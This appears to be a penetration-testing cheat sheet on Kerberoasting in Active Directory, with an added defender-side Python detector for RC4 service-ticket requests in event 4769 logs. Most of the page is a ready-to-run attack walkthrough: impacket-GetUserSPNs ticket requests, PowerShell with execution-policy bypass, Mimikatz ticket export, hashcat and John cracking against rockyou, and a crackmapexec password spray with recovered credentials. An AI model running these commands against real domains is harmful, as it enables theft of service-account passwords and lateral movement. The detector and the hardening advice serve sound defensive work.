Kerberoast

Theory

Kerberoasting is an extremely common attack in Active Directory environments. It targets domain accounts that have an SPN (Service Principal Name) set; these are typically service accounts such as the ones running IIS or MSSQL.

Kerberoasting involves requesting a Kerberos service ticket (TGS) from a Windows domain machine or a Kali box, using something like GetUserSPNs.py. The weakness is that once the DC looks up the target SPN, it encrypts the TGS with the NTLM password hash of the service account that owns that SPN, so the ticket can be cracked offline.
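As an added, defender-side example (not part of the original page): a small detector that runs over constructed Windows Security event 4769 lines (Kerberos service ticket requested) and flags any account that requests RC4-encrypted service tickets for several user SPN accounts in one batch, which is the footprint the TGS request described above leaves on the DC. Field names follow the 4769 event; the sample log lines, the key=value export format and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample 4769 events, one per line, in a key=value form as a SIEM
# might export them. Not real log data.
SAMPLE_4769 = [
    "EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=DC01$ TicketEncryptionType=0x12 Status=0x0 IpAddress=10.0.0.15",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_mssql TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.23",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_iis TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.23",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.23",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.23",
    "EventID=4769 TargetUserName=carol@CORP.LOCAL ServiceName=svc_mssql TicketEncryptionType=0x12 Status=0x0 IpAddress=10.0.0.31",
    "EventID=4768 TargetUserName=dave@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.40",
]

RC4_HMAC = 0x17  # etype 23; the AES types are 0x11 (AES128) and 0x12 (AES256)

def parse_event(line):
    """Turn one key=value line into a dict (values kept as strings)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def is_rc4_service_request(ev):
    """True for a successful 4769 for a user (non-machine, non-krbtgt) SPN with RC4."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False  # machine accounts and the TGT service are not the targets here
    return int(ev.get("TicketEncryptionType", "0"), 16) == RC4_HMAC

def detect_kerberoast(lines, min_distinct_services=3):
    """Group RC4 service-ticket requests by (requester, source IP) and report
    requesters that hit at least min_distinct_services distinct SPN accounts."""
    per_requester = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if is_rc4_service_request(ev):
            per_requester[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in per_requester.items() if len(v) >= min_distinct_services}

if __name__ == "__main__":
    for (user, ip), services in detect_kerberoast(SAMPLE_4769).items():
        print(f"ALERT {user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

Forcing AES-only tickets on service accounts (and retiring RC4) removes the cheap crack this rule looks for; the same grouping then still works with the etype filter widened, but AES tickets are far more expensive to brute-force.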

Having a Credential

Step 1: Impacket-GetUserSPNs

Use impacket-GetUserSPNs to gather SPNs. You must have a valid domain credential:

impacket-GetUserSPNs.py '<domain>/<username>:<password>' -dc-ip <target_ip> -request

Step 2: Crack the TGS ticket with hashcat

Save the TGS hash printed by -request as hash.txt and crack it with hashcat mode 13100:

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

Having a Shell

Step 1: GetUserSPNs

Transfer the GetUserSPNs.ps1 script from the following GitHub repo to the victim machine and run it:

https://github.com/nidem/kerberoast

powershell -ep bypass
.\GetUserSPNs.ps1

Step 2: Request service tickets

Execute the following two commands in PowerShell:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<SPN>'

Or request the ticket with Mimikatz:

.\mimikatz.exe
    privilege::debug
    kerberos::ask /target:<spn>

Step 3: Export service ticket to kirbi file

Transfer /usr/share/windows-resources/mimikatz/x64/mimikatz.exe to the victim machine and export the service ticket:

.\mimikatz.exe
    privilege::debug
    kerberos::list /export

Download the kirbi file to Kali.

Step 4: Crack the kirbi file with John

Convert the kirbi file to John's format:

python3 /usr/share/windows-resources/kerberoast/kirbi2john.py '<kirbi_file>' > hash.txt

Note that this kirbi2john.py script is also from the "kerberoast" GitHub repo mentioned above. Don't use the Kali built-in kirbi2john; it does not work at the time of writing.

Crack the hash with John:

john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Password Spray

Note that users might reuse the same password for different accounts. Once you have a plaintext password, spray it against the username list you collected from net user /domain with crackmapexec:

crackmapexec smb <target_ip> -u users.txt -p <password>
